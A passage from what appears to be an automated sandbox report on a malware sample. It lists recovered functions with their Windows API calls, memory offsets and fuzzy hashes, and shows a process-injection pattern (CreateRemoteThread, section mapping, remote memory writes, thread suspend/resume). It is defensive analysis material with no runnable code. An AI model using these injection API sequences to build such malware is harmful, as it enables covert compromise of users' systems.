                                                                                                                                        • CreateRemoteThread.KERNELBASE ref: 00FBF6DA
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000023.00000002.853027168.0000000000FA1000.00000020.00000001.sdmp, Offset: 00FA1000, based on PE: false
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateInformationProcessRemoteThread
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3020566308-0
                                                                                                                                        • Opcode ID: eefa1745caba52824cf527048ce14a6f16dbe5d5b4e594528adcf73a562a3661
                                                                                                                                        • Instruction ID: 84f615a891aeba56ca3176f5401a3dd0f61e588ec04a5da8febaaaa4839de083
                                                                                                                                        • Opcode Fuzzy Hash: eefa1745caba52824cf527048ce14a6f16dbe5d5b4e594528adcf73a562a3661
                                                                                                                                        • Instruction Fuzzy Hash: B551B23161CB098FE758EF29D8896A677E1FB99311F00443DE94AC3261DE74D9498B81
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00FCC164, Relevance: 4.0, APIs: 2, Instructions: 1050synchronizationCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000023.00000002.853027168.0000000000FA1000.00000020.00000001.sdmp, Offset: 00FA1000, based on PE: false
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateMutexNameUser
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3764123871-0
                                                                                                                                        • Opcode ID: fffaa4b755b4794267c42af2f427b21d38ec734e3ecc3f810019e9c7598c9933
                                                                                                                                        • Instruction ID: 3a7f9b5deb17b1cd150d360e139f6ed69a23941632281d24efe15a7c274afef4
                                                                                                                                        • Opcode Fuzzy Hash: fffaa4b755b4794267c42af2f427b21d38ec734e3ecc3f810019e9c7598c9933
                                                                                                                                        • Instruction Fuzzy Hash: 8E72C471A18A4A8FD728EF28ED86A7537E1F758710F10453ED44BC3661DE39D842EB82
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00FB387C, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 214nativeCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • NtCreateSection.NTDLL ref: 00FB3A1E
                                                                                                                                          • Part of subcall function 00FBFFCC: NtMapViewOfSection.NTDLL ref: 00FC0018
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000023.00000002.853027168.0000000000FA1000.00000020.00000001.sdmp, Offset: 00FA1000, based on PE: false
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Section$CreateView
                                                                                                                                        • String ID: 0
                                                                                                                                        • API String ID: 1585966358-4108050209
                                                                                                                                        • Opcode ID: 1b09ba81fbc693a19164b594d56175538ac6b8b8ca3d4d1b7c118079c7b6344a
                                                                                                                                        • Instruction ID: a1b67a0b8f331385c1c587d0101fcf124e1a65f62046967c2e86a510e167df11
                                                                                                                                        • Opcode Fuzzy Hash: 1b09ba81fbc693a19164b594d56175538ac6b8b8ca3d4d1b7c118079c7b6344a
                                                                                                                                        • Instruction Fuzzy Hash: F761F47460CF098FDB54EF19D889BA577E5FB98311F10856EE84AC7261DB38E901CB81
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00FABAB4, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 39memorynativeCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • NtAllocateVirtualMemory.NTDLL ref: 00FABAF1
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000023.00000002.853027168.0000000000FA1000.00000020.00000001.sdmp, Offset: 00FA1000, based on PE: false
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AllocateMemoryVirtual
                                                                                                                                        • String ID: @
                                                                                                                                        • API String ID: 2167126740-2766056989
                                                                                                                                        • Opcode ID: f2b98a115a46b9e14b99d056e6ec68db975ce604077d4ffc8ec3e6b59ad833c6
                                                                                                                                        • Instruction ID: bea7718587132e81c4317f98bd4bfa2e8c3c9724f0afe3ae85e86751ae0707b9
                                                                                                                                        • Opcode Fuzzy Hash: f2b98a115a46b9e14b99d056e6ec68db975ce604077d4ffc8ec3e6b59ad833c6
                                                                                                                                        • Instruction Fuzzy Hash: FBF090B0A19B088FDB549FA8D8CD63976E0F759305F60096DE10AC7255EB78C944C741
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00FE1002, Relevance: 3.3, APIs: 2, Instructions: 346nativeCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • NtProtectVirtualMemory.NTDLL ref: 00FE127A
                                                                                                                                        • NtProtectVirtualMemory.NTDLL ref: 00FE1309
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000023.00000002.853091429.0000000000FE1000.00000040.00000001.sdmp, Offset: 00FE1000, based on PE: false
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MemoryProtectVirtual
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2706961497-0
                                                                                                                                        • Opcode ID: 1253e22b076482ef6065ed3961c97111b29290f7fe7d5e01fcbde899dc7d80c1
                                                                                                                                        • Instruction ID: 7de6347c013be513be896119e76c5013c0776d71bb4afe32180dc9099c301f76
                                                                                                                                        • Opcode Fuzzy Hash: 1253e22b076482ef6065ed3961c97111b29290f7fe7d5e01fcbde899dc7d80c1
                                                                                                                                        • Instruction Fuzzy Hash: 8CB1263161CBC84FC725DF2ACC816A9B7E1FB96310F5849AED1CBC7252D634A8469782
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00FCADD4, Relevance: 1.7, APIs: 1, Instructions: 183nativeCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • NtQueryInformationProcess.NTDLL ref: 00FCAE49
                                                                                                                                          • Part of subcall function 00FACCA0: NtReadVirtualMemory.NTDLL ref: 00FACCBF
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000023.00000002.853027168.0000000000FA1000.00000020.00000001.sdmp, Offset: 00FA1000, based on PE: false
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InformationMemoryProcessQueryReadVirtual
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1498878907-0
                                                                                                                                        • Opcode ID: d01a758f901a9215e797dd66cccda8b0241a4ddb1edb813280150e88a935fc82
                                                                                                                                        • Instruction ID: 372523e5a3f521e35668d58cc01178503a108e99f2dafa343db5404523533720
                                                                                                                                        • Opcode Fuzzy Hash: d01a758f901a9215e797dd66cccda8b0241a4ddb1edb813280150e88a935fc82
                                                                                                                                        • Instruction Fuzzy Hash: 9D510970618B094FD719EB28E88579673D5FBD8354F00856EA88EC3245DE34D944CB83
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00FB1AC4, Relevance: 1.6, APIs: 1, Instructions: 51nativeCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • NtQueryInformationProcess.NTDLL ref: 00FB1AEA
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000023.00000002.853027168.0000000000FA1000.00000020.00000001.sdmp, Offset: 00FA1000, based on PE: false
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InformationProcessQuery
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1778838933-0
                                                                                                                                        • Opcode ID: 1b5ff2e331e8eff1cde1f90d4881bb7eda4a5dda6d44182f68fae4d6ac00e22a
                                                                                                                                        • Instruction ID: 7dc3ecd1affd8c46b717bbfbfa992c5367ac0289997faaa7ee0e2463cd34dc61
                                                                                                                                        • Opcode Fuzzy Hash: 1b5ff2e331e8eff1cde1f90d4881bb7eda4a5dda6d44182f68fae4d6ac00e22a
                                                                                                                                        • Instruction Fuzzy Hash: C501A930728E4D8FAB94DF69D4D8A7573E1FBE8319794456E9409C3160E738D885CB01
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00FBFFCC, Relevance: 1.5, APIs: 1, Instructions: 46nativeCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000023.00000002.853027168.0000000000FA1000.00000020.00000001.sdmp, Offset: 00FA1000, based on PE: false
                                                                                                                                        Similarity
                                                                                                                                        • API ID: SectionView
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1323581903-0
                                                                                                                                        • Opcode ID: fcd82b1f9bd2768ab02ed58a59795749d2e6ecb94e6dd7f1d9f4b656cf451d04
                                                                                                                                        • Instruction ID: 46ddae886d84241c24fef0fa1bc7dda889e02618afb862b8e8fb9dbbff3c6d2f
                                                                                                                                        • Opcode Fuzzy Hash: fcd82b1f9bd2768ab02ed58a59795749d2e6ecb94e6dd7f1d9f4b656cf451d04
                                                                                                                                        • Instruction Fuzzy Hash: 5D011670A08B048FCB44DF68D0C8569BBE0FB58311B10066FE849C7796DB30D885CB45
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00FACCA0, Relevance: 1.5, APIs: 1, Instructions: 30nativeCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000023.00000002.853027168.0000000000FA1000.00000020.00000001.sdmp, Offset: 00FA1000, based on PE: false
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MemoryReadVirtual
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2834387570-0
                                                                                                                                        • Opcode ID: 3f2a82dcf9ff75e792bad1dcc2e5ed508050df83e28b3dd4d81e6d546fa6ee8d
                                                                                                                                        • Instruction ID: be6a4294c81a4f16f0cd2fa5601c1e24ba45f8b5f74a19f4a20e3ed0d1b0ed69
                                                                                                                                        • Opcode Fuzzy Hash: 3f2a82dcf9ff75e792bad1dcc2e5ed508050df83e28b3dd4d81e6d546fa6ee8d
                                                                                                                                        • Instruction Fuzzy Hash: B7E012B5715A844BDB109FB49CC963972D1F749315F500439E94AC7360D52DC855A642
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00FB3830, Relevance: 1.5, APIs: 1, Instructions: 30nativeCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • NtWriteVirtualMemory.NTDLL ref: 00FB384F
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000023.00000002.853027168.0000000000FA1000.00000020.00000001.sdmp, Offset: 00FA1000, based on PE: false
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MemoryVirtualWrite
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3527976591-0
                                                                                                                                        • Opcode ID: 85032ad9a9dd339a53993ae2441a8bbbfc633b83b0a06364b991555090b07627
                                                                                                                                        • Instruction ID: 0a9fccf2477b3d3db0eb1bda9b769ebdc04d78df4bdd8eebb49a0e3df9e34d81
                                                                                                                                        • Opcode Fuzzy Hash: 85032ad9a9dd339a53993ae2441a8bbbfc633b83b0a06364b991555090b07627
                                                                                                                                        • Instruction Fuzzy Hash: 51E0DF35B55A414BEB006BBA8CC83B833E1F788301F200839F941C3320C72DC9449B43
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00FA27E8, Relevance: 6.2, APIs: 4, Instructions: 237threadinjectionCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000023.00000002.853027168.0000000000FA1000.00000020.00000001.sdmp, Offset: 00FA1000, based on PE: false
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ProtectThreadVirtual$ResumeSuspend
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3483329683-0
                                                                                                                                        • Opcode ID: 912752427acc2773dc81b88a95aedc23f4bd7857b4c9cbc1eabf0f137d43b05d
                                                                                                                                        • Instruction ID: 1cf55c546db479faf391760ad10d553d95aa4c531e288ed36a246cc2cc3de755
                                                                                                                                        • Opcode Fuzzy Hash: 912752427acc2773dc81b88a95aedc23f4bd7857b4c9cbc1eabf0f137d43b05d
                                                                                                                                        • Instruction Fuzzy Hash: 5461D271B1CB094FD7A8EB1CE8957AA73E5FB89315F00052DE48AC3291DF38D9419B86
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00FBE8C8, Relevance: 6.1, APIs: 4, Instructions: 146fileCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • CreateFileA.KERNELBASE ref: 00FBE999
                                                                                                                                        • SetFilePointer.KERNELBASE ref: 00FBE9B3
                                                                                                                                        • ReadFile.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00FC6B1C), ref: 00FBE9D5
                                                                                                                                        • FindCloseChangeNotification.KERNELBASE ref: 00FBE9F0
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000023.00000002.853027168.0000000000FA1000.00000020.00000001.sdmp, Offset: 00FA1000, based on PE: false
                                                                                                                                        Similarity
                                                                                                                                        • API ID: File$ChangeCloseCreateFindNotificationPointerRead
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2405668454-0
                                                                                                                                        • Opcode ID: d48e66415ee8c958f108398a66507d7349109b7993f4cd815dda9dd15392f6da
                                                                                                                                        • Instruction ID: f4e5e480c4bae5703083fe3d9a8f2b92028a96bd2fde7f1c84adce9cccd1719a
                                                                                                                                        • Opcode Fuzzy Hash: d48e66415ee8c958f108398a66507d7349109b7993f4cd815dda9dd15392f6da
                                                                                                                                        • Instruction Fuzzy Hash: 36410C30218A184FDB58DF28DCC5AA977E1FB88315B24866DE19BC7266DF34D447CB81
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00FC0F8C, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 99registryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00FCA864: RegCreateKeyA.ADVAPI32 ref: 00FCA887
                                                                                                                                        • RegQueryValueExA.KERNELBASE ref: 00FC0FF5
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000023.00000002.853027168.0000000000FA1000.00000020.00000001.sdmp, Offset: 00FA1000, based on PE: false
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateQueryValue
                                                                                                                                        • String ID: ($(
                                                                                                                                        • API String ID: 2711935003-222463766
                                                                                                                                        • Opcode ID: e12b90d25e48638c248cf623991a1d23c50be5cb427306bedcf9ef54acb60cae
                                                                                                                                        • Instruction ID: 55d362279f93e32794499d01c0ff3480ab9fc1631c224d13e90d5f5b5ebc25f1
                                                                                                                                        • Opcode Fuzzy Hash: e12b90d25e48638c248cf623991a1d23c50be5cb427306bedcf9ef54acb60cae
                                                                                                                                        • Instruction Fuzzy Hash: 9031D574A087898FF304DF54EC99BA6B3E1F799304F00861EE44AC3261DB7C9588DB02
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00FC6E1C, Relevance: 4.6, APIs: 3, Instructions: 147COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • StrRChrA.KERNELBASE ref: 00FC6E7A
                                                                                                                                        • RtlAddVectoredContinueHandler.NTDLL ref: 00FC6F6E
                                                                                                                                        • RtlRemoveVectoredExceptionHandler.NTDLL ref: 00FC6FA2
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000023.00000002.853027168.0000000000FA1000.00000020.00000001.sdmp, Offset: 00FA1000, based on PE: false
                                                                                                                                        Similarity
                                                                                                                                        • API ID: HandlerVectored$ContinueExceptionRemove
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 133484311-0
                                                                                                                                        • Opcode ID: 18d8ac82230bdfc4302373f1128c0f5960e1e63dc188b60f3db038388c3e2014
                                                                                                                                        • Instruction ID: fe1c9c4b572ad5cd9b0deb7fba1fe1071389aab01689bde9788d24d562a8e8f4
                                                                                                                                        • Opcode Fuzzy Hash: 18d8ac82230bdfc4302373f1128c0f5960e1e63dc188b60f3db038388c3e2014
                                                                                                                                        • Instruction Fuzzy Hash: 56410930A0C7068FEB50EF68A995BAA77E1FB98311F44812ED44AC3271DF38C505DB45
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00FD1310, Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 311libraryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000023.00000002.853027168.0000000000FA1000.00000020.00000001.sdmp, Offset: 00FA1000, based on PE: false
                                                                                                                                        Similarity
                                                                                                                                        • API ID: LibraryLoad
                                                                                                                                        • String ID: H
                                                                                                                                        • API String ID: 1029625771-2852464175
                                                                                                                                        • Opcode ID: ea8b0be554912eee910b5f6e76d5c63edd561062f2e3a805656d28eae44b2b83
                                                                                                                                        • Instruction ID: caacc96e61f4ab6ddca15ed7269146b093992db9d098805b3cd2854bacb1c81b
                                                                                                                                        • Opcode Fuzzy Hash: ea8b0be554912eee910b5f6e76d5c63edd561062f2e3a805656d28eae44b2b83
                                                                                                                                        • Instruction Fuzzy Hash: 37A16030608B0A9FE755DF58D88876673E2FB99315F08462FD84AC7261EF38D945CB82
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00FCFEB8, Relevance: 3.2, APIs: 2, Instructions: 202memoryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00FC1458: VirtualProtect.KERNELBASE ref: 00FC148B
                                                                                                                                        • VirtualProtect.KERNELBASE ref: 00FCFFD6
                                                                                                                                        • VirtualProtect.KERNELBASE ref: 00FCFFF9
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000023.00000002.853027168.0000000000FA1000.00000020.00000001.sdmp, Offset: 00FA1000, based on PE: false
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ProtectVirtual
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 544645111-0
                                                                                                                                        • Opcode ID: 8ab32006bd1df6a701864ba7e3d69da663e7aed914991a2a5fb048f6e1491c04
                                                                                                                                        • Instruction ID: ee0ba942066a7f901a99cd63c9f0b6b9a055433c854511b6ac9e5c3659d6f87e
                                                                                                                                        • Opcode Fuzzy Hash: 8ab32006bd1df6a701864ba7e3d69da663e7aed914991a2a5fb048f6e1491c04
                                                                                                                                        • Instruction Fuzzy Hash: 62515A70618B098FDB44EF29D88AB65B7E1FB9C311F14056EA44AC3261DF34E945CB86
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00FA8A58, Relevance: 3.1, APIs: 2, Instructions: 106registryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000023.00000002.853027168.0000000000FA1000.00000020.00000001.sdmp, Offset: 00FA1000, based on PE: false
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseOpen
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 47109696-0
                                                                                                                                        • Opcode ID: 0bc493057bba55174271d39b91fef6ffa0c4270635545858b5e3c13c28f28606
                                                                                                                                        • Instruction ID: 5c3de5a8ad79a9391de7b665ba029e739cc858e18a960e8fd325fc3f5c05c0ea
                                                                                                                                        • Opcode Fuzzy Hash: 0bc493057bba55174271d39b91fef6ffa0c4270635545858b5e3c13c28f28606
                                                                                                                                        • Instruction Fuzzy Hash: BA318170618B4C8FDB54EF28E88595AB3E5FB98300B014A6EE44BC3251EF38D945DB82
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00FC36DC, Relevance: 3.1, APIs: 2, Instructions: 101registryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • RegQueryValueExA.KERNELBASE ref: 00FC371F
                                                                                                                                        • RegQueryValueExA.KERNELBASE ref: 00FC37A3
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000023.00000002.853027168.0000000000FA1000.00000020.00000001.sdmp, Offset: 00FA1000, based on PE: false
                                                                                                                                        Similarity
                                                                                                                                        • API ID: QueryValue
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3660427363-0
                                                                                                                                        • Opcode ID: 2d61ef76a0f9e6cd2723d50ffb87ea22aa6033d0a4024559b1a73c32d09c5853
                                                                                                                                        • Instruction ID: 09534bc1bd5e1276772b8e8bf1d9b8ff167e1450a0147f40dc95eeb32c96077a
                                                                                                                                        • Opcode Fuzzy Hash: 2d61ef76a0f9e6cd2723d50ffb87ea22aa6033d0a4024559b1a73c32d09c5853
                                                                                                                                        • Instruction Fuzzy Hash: 21318E7161CB098FDB48EF18D889B66B7E1FBA8311F11856EE849C3251DF34ED418B86
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00FB076C, Relevance: 3.1, APIs: 2, Instructions: 97registryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00FCA864: RegCreateKeyA.ADVAPI32 ref: 00FCA887
                                                                                                                                        • RegQueryValueExA.KERNELBASE ref: 00FB07C3
                                                                                                                                        • RegCloseKey.KERNELBASE ref: 00FB0833
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000023.00000002.853027168.0000000000FA1000.00000020.00000001.sdmp, Offset: 00FA1000, based on PE: false
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseCreateQueryValue
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4083198587-0
                                                                                                                                        • Opcode ID: 63f8bf2ffbde9439b19e476579ef08d7f0cd75ef32b6588a115372ae452a6d9a
                                                                                                                                        • Instruction ID: e57611ea1929ec2319b59172ff91662faa66e0aad27db70f8fc29ddb0817696f
                                                                                                                                        • Opcode Fuzzy Hash: 63f8bf2ffbde9439b19e476579ef08d7f0cd75ef32b6588a115372ae452a6d9a
                                                                                                                                        • Instruction Fuzzy Hash: 1E210C74718B088FE794EF29E88976677E1FB9C351F10452AA84AC3261EF34D941DB82
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00FCA864, Relevance: 3.1, APIs: 2, Instructions: 60registryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000023.00000002.853027168.0000000000FA1000.00000020.00000001.sdmp, Offset: 00FA1000, based on PE: false
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateOpen
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 436179556-0
                                                                                                                                        • Opcode ID: 0fd58de01818f39c689c8671fe547acd9089d8ae02dcc106006c6a54173f430a
                                                                                                                                        • Instruction ID: 773a04941e8986ad23ab0846441ece6a358da75264984b0e97432e6a3b2dc7eb
                                                                                                                                        • Opcode Fuzzy Hash: 0fd58de01818f39c689c8671fe547acd9089d8ae02dcc106006c6a54173f430a
                                                                                                                                        • Instruction Fuzzy Hash: D001D634A08A098FDB44EB5CD488B69B7E1FBEC315F10442EE88DC3361DAB4D9418783
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00FB7DD8, Relevance: 1.7, APIs: 1, Instructions: 216memoryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000023.00000002.853027168.0000000000FA1000.00000020.00000001.sdmp, Offset: 00FA1000, based on PE: false
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ProtectVirtual
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 544645111-0
                                                                                                                                        • Opcode ID: 6aa1d7655563690a4da4f05cca64eafe950653d6a721fc7ea7dd1fa497ac3de5
                                                                                                                                        • Instruction ID: 8652e7eb40d7c087f3e9f10e7649dfe14ae2b85586ed9793b52a0ce181e43f96
                                                                                                                                        • Opcode Fuzzy Hash: 6aa1d7655563690a4da4f05cca64eafe950653d6a721fc7ea7dd1fa497ac3de5
                                                                                                                                        • Instruction Fuzzy Hash: 23617F3061CF099FD794EF19E885AA6B3E1FBA8311B50455EE84AC3661DB34E8418BC6
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00FC1BA4, Relevance: 1.6, APIs: 1, Instructions: 107processCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000023.00000002.853027168.0000000000FA1000.00000020.00000001.sdmp, Offset: 00FA1000, based on PE: false
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateProcess
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 963392458-0
                                                                                                                                        • Opcode ID: 3c5b31f2ade86ff256e9c3c63348cc97b153446f68cd2a262a3ba859843ab9a0
                                                                                                                                        • Instruction ID: bfb3aa6189c989052a89d8273d258db0f1bc6387564de403acadbb647bc6b851
                                                                                                                                        • Opcode Fuzzy Hash: 3c5b31f2ade86ff256e9c3c63348cc97b153446f68cd2a262a3ba859843ab9a0
                                                                                                                                        • Instruction Fuzzy Hash: 0A312F7060CB484FDB58EF1CD885B65B7E1FB99711F04466EE84DC3262DA70ED418B86
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00FAD064, Relevance: 1.6, APIs: 1, Instructions: 105COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000023.00000002.853027168.0000000000FA1000.00000020.00000001.sdmp, Offset: 00FA1000, based on PE: false
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Sleep
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3472027048-0
                                                                                                                                        • Opcode ID: 52f1519f99e7b6274678f0f96dd7df39cf1b8b21fb562168254a445fe9a10dfd
                                                                                                                                        • Instruction ID: 1117177867ba6712a44a063a942c8aaf880b427ed086506e7f9a3de929b683c7
                                                                                                                                        • Opcode Fuzzy Hash: 52f1519f99e7b6274678f0f96dd7df39cf1b8b21fb562168254a445fe9a10dfd
                                                                                                                                        • Instruction Fuzzy Hash: 1C3170347546448BAB68EF29ECD5A6A73E6FB983007244039A407C3651DF3CE8079B42
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00FC1458, Relevance: 1.6, APIs: 1, Instructions: 74memoryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000023.00000002.853027168.0000000000FA1000.00000020.00000001.sdmp, Offset: 00FA1000, based on PE: false
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ProtectVirtual
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 544645111-0
                                                                                                                                        • Opcode ID: 4a765497a387f33308d21eb6f57c50523c4476f30fd5c9db11123bb1565e96cc
                                                                                                                                        • Instruction ID: b2ae2ceb9522b46746ebcad4e403e82eb7e25c967c61710fc83714b67106a2e4
                                                                                                                                        • Opcode Fuzzy Hash: 4a765497a387f33308d21eb6f57c50523c4476f30fd5c9db11123bb1565e96cc
                                                                                                                                        • Instruction Fuzzy Hash: 4011813160CB088F9B18EF59E8865A5B3E5FB9D316700452DE94EC3256EA30ED05CBC2
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00FB638C, Relevance: 1.6, APIs: 1, Instructions: 73registryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00FCA864: RegCreateKeyA.ADVAPI32 ref: 00FCA887
                                                                                                                                        • RegQueryValueExA.KERNELBASE ref: 00FB63E2
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000023.00000002.853027168.0000000000FA1000.00000020.00000001.sdmp, Offset: 00FA1000, based on PE: false
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateQueryValue
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2711935003-0
                                                                                                                                        • Opcode ID: a38569a501b8e0ec64ed77100791f3d441e58a8fbacd49a898224bfc5fb91074
                                                                                                                                        • Instruction ID: a6ebc8827be0fb7b9b93e5ad339aefbfed78ce4eab8d8aa6c76c5aebf42cdf3b
                                                                                                                                        • Opcode Fuzzy Hash: a38569a501b8e0ec64ed77100791f3d441e58a8fbacd49a898224bfc5fb91074
                                                                                                                                        • Instruction Fuzzy Hash: 47212E30518B488FE755EF65D888BAAB7E1FB98305F50092EF48AC3250EBB8D545DF42
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00FAFB90, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
